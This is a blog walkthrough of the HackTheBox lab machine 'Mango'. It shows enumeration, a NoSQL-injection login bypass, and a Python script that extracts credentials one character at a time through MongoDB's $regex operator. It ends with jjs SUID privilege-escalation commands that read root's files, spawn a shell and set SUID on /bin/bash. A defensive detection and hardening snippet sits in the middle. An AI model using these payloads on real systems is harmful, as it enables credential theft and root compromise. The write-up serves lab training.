HackTheBox | Mango Walkthrough

Abdulrhman
4 min read · Mar 13, 2024

Hi Folks!

Hope you are doing well.

Let’s get started with enumeration.

Enumeration

Nmap Scan

nmap -T4 -v -p- -sCV <target_ip>

[Screenshot: nmap report]

We got three open ports: 22 running SSH, 80 running HTTP and 443 running HTTPS.

The nmap output discloses the box’s domain names: mango.htb and staging-order.mango.htb.

So let’s add them to our hosts file.

echo "<target_ip>  mango.htb  staging-order.mango.htb" >> /etc/hosts

Web Enumeration

HTTP

When we access the HTTP service, we get a Forbidden (403) response.

[Screenshot: HTTP]

Here, I used dirsearch to fuzz for directories, but I didn’t get much.

[Screenshot: dirsearch report]

HTTPS

So let’s access the HTTPS service.

[Screenshot: HTTPS]

Navigating through the app, most of the links are dead; I only found an /analytics.php page, which presents a spreadsheet with a pie chart.

[Screenshot: Analytics page]

The menus are interesting, but they are dead links.

So our last chance is the HTTPS subdomain, staging-order.mango.htb.

[Screenshot: HTTPS subdomain]

I tried to log in, to bypass the login with some SQLi payloads and to brute-force it, but I got nothing.

Here, I got stuck for some time. But the box is called Mango, which is interesting as it may refer to MongoDB, and I hadn’t tried NoSQLi payloads yet.

Exploitation

So I decided to try some NoSQLi payloads to bypass the login, and it worked!

[Screenshot: Bypass the login with NoSQLi]

I got redirected to a /home.php page.

[Screenshot: home page]

I didn’t find anything interesting on the home page, so I went back to the login page to try to dump some credentials.

Here, I used a Python script from HackTricks that abuses the $regex operator to brute-force the login usernames and passwords one character at a time, so I could reuse them to log in over SSH.

import requests
import string

url = "http://example.com"
headers = {"Host": "example.com"}
cookies = {"PHPSESSID": "s3gcsgtqre05bah2vt6tibq8lsdfk"}
# Candidate characters; punctuation and whitespace are backslash-escaped so the regex matches them literally
possible_chars = list(string.ascii_letters) + list(string.digits) + ["\\" + c for c in string.punctuation + string.whitespace]

def get_password(username):
    print("Extracting password of " + username)
    params = {"username": username, "password[$regex]": "", "login": "login"}
    password = "^"
    while True:
        for c in possible_chars:
            params["password[$regex]"] = password + c + ".*"
            pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False)
            # A 302 redirect means the login succeeded, i.e. the regex prefix matched
            if int(pr.status_code) == 302:
                password += c
                break
        else:
            # No character extends the match, so the password is complete
            print("Found password " + password[1:].replace("\\", "") + " for username " + username)
            return password[1:].replace("\\", "")

def get_usernames(prefix):
    usernames = []
    params = {"username[$regex]": "", "password[$regex]": ".*"}
    for c in possible_chars:
        username = "^" + prefix + c
        params["username[$regex]"] = username + ".*"
        pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False)
        if int(pr.status_code) == 302:
            print(username)
            # Recurse to extend the matching prefix; a prefix nothing extends is a complete username
            longer = get_usernames(prefix + c)
            usernames.extend(longer if longer else [prefix + c])
    return usernames

for u in get_usernames(""):
    get_password(u)
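To see why the password[$regex] parameters in that script reach the database as a query operator, and what the server-side fix looks like, here is an added example that is not from the post, HackTricks or the box’s own code. It models PHP’s bracket-parameter parsing in Python, flags MongoDB operators smuggled into a form body, and shows the unsafe filter construction beside a hardened one; the request bodies are constructed, not captured from the box.

```python
from typing import Any
from urllib.parse import parse_qsl


def parse_php_form(body: str) -> dict[str, Any]:
    """Mimic how PHP turns 'field[key]=value' into a nested $_POST array.

    Only the single-level case is modelled (no 'a[]' lists); it is enough to show
    how 'password[$regex]=^h.*' arrives as a dict instead of a string.
    """
    params: dict[str, Any] = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        if "[" in key and key.endswith("]"):
            base, sub = key.split("[", 1)
            if not isinstance(params.get(base), dict):
                params[base] = {}
            params[base][sub[:-1]] = value
        else:
            params[key] = value
    return params


def find_operator_injection(params: dict[str, Any]) -> list[str]:
    """Detection: return 'field.$op' for every MongoDB operator hidden in a form field."""
    return [f"{field}.{op}" for field, value in params.items()
            if isinstance(value, dict) for op in value if op.startswith("$")]


def vulnerable_login_filter(params: dict[str, Any]) -> dict[str, Any]:
    """Unsafe pattern: form values go straight into the find() filter, nested dict and all."""
    return {"username": params.get("username"), "password": params.get("password")}


def build_login_filter(params: dict[str, Any]) -> dict[str, str]:
    """Hardened pattern: each credential must be a plain string, so no operator can reach the query."""
    filt: dict[str, str] = {}
    for field in ("username", "password"):
        value = params.get(field)
        if not isinstance(value, str):
            raise ValueError(f"{field} must be a plain string, got {type(value).__name__}")
        filt[field] = value
    return filt


# Constructed sample request bodies: one honest login and one regex-extraction attempt
BENIGN_BODY = "username=mango&password=hunter2&login=login"
INJECTED_BODY = "username=admin&password[$regex]=^h.*&login=login"

if __name__ == "__main__":
    for body in (BENIGN_BODY, INJECTED_BODY):
        print(body, "->", find_operator_injection(parse_php_form(body)) or "clean")
```

The same check belongs in the PHP handler itself: cast each field with (string) or reject non-scalar input before building the filter, and alert on any form key containing a $-prefixed operator.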

I got two credentials.

[Screenshot: dump credentials]

I tried to log in with admin, but it didn’t work, so I used mango to log in and it worked.

[Screenshot: SSH login]

I found an admin user, and we can use the recovered credentials to switch to it.

[Screenshot: switch to admin user]

Privilege Escalation

Enumeration

I found an interesting SUID binary.

[Screenshot: SUID binary]

I used GTFOBins to look up the binary, jjs, and found a privilege-escalation technique for it.

We can just read the root flag.

echo 'var BufferedReader = Java.type("java.io.BufferedReader");
var FileReader = Java.type("java.io.FileReader");
var br = new BufferedReader(new FileReader("/root/root.txt"));
while ((line = br.readLine()) != null) { print(line); }' | jjs

[Screenshot: root.txt]

Or we can get a shell.

echo "Java.type('java.lang.Runtime').getRuntime().exec('/bin/sh -pc \$@|sh\${IFS}-p _ echo sh -p <$(tty) >$(tty) 2>$(tty)').waitFor()" | jjs

But it didn’t work for me, so I decided to just set the SUID bit on /bin/bash.

echo "Java.type('java.lang.Runtime').getRuntime().exec('chmod +s /bin/bash').waitFor()" | jjs

[Screenshot: Getting root]

Conclusion

This was great fun!

I hope you enjoyed the walkthrough. I’m looking forward to your feedback.

Don’t forget to check other walkthroughs.
